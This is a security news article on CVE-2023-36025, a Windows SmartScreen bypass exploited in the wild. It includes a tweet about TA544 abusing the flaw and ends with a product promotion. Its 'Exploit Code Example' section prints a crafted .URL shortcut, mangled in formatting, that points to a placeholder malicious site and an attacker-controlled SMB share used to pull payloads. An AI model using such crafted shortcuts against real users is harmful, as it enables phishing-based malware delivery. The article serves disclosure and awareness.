Microsoft released multiple security patches as part of their Patch Tuesday, in which three zero-day vulnerabilities were also patched. One of the zero-day vulnerabilities was CVE-2023-36025, which affected the Windows SmartScreen function.
This vulnerability was given a severity rating of 8.8 (High) and was actively exploited by threat actors in the wild. This vulnerability was reported to be a security bypass vulnerability that an unauthorized threat actor can exploit but requires user interaction for successful exploitation.
Windows SmartScreen Zero-day Vulnerability
SmartScreen guards against untrusted sources, warning users about potentially malicious websites and files.
This vulnerability allows a threat actor to craft special files or hyperlinks that could bypass SmartScreen’s security warnings.
However, the exploitation of this vulnerability was associated with a crafted Internet Shortcut File (.URL), which SmartScreen does not properly validate.
Exploit Code Example
A crafted file that can exploit this vulnerability can be found below
[InternetShortcut]URL=malicious-website.comIDList=IconFile=\\\\\\\\192.168.1.100\\\\share\\\\icon.icoIconIndex=1
The URL in the file points to a malicious website, and the IconFile path can point to a network location controlled by the threat actor. With these parameters, a threat actor could download malicious payloads and execute them on vulnerable systems.
#TA544 back using #Remcos after using #SystemBC briefly last week. Unique page,link URLs redir to .url file with file://.zip/.vhd SMB target abusing CVE-2023-36025 so it will mount the VHD by just opening the .URL. Exe using #DOILoader #IDATLoader w. local payload. cc @wdormann pic.twitter.com/Z7vXWUZ1ZV
— Tommy M (TheAnalyst) (@ffforward) November 20, 2023
Moreover, the initial delivery of this malicious file could be through phishing emails or compromised websites. If the user downloads and clicks on the malicious internet shortcut file, the payload gets executed, providing access to a threat actor.
A complete proof of concept for this vulnerability has been published, providing detailed information on the source code, method, and other information.
Experience how StorageGuard eliminates the security blind spots in your storage systems by trying a 14-day free trial.
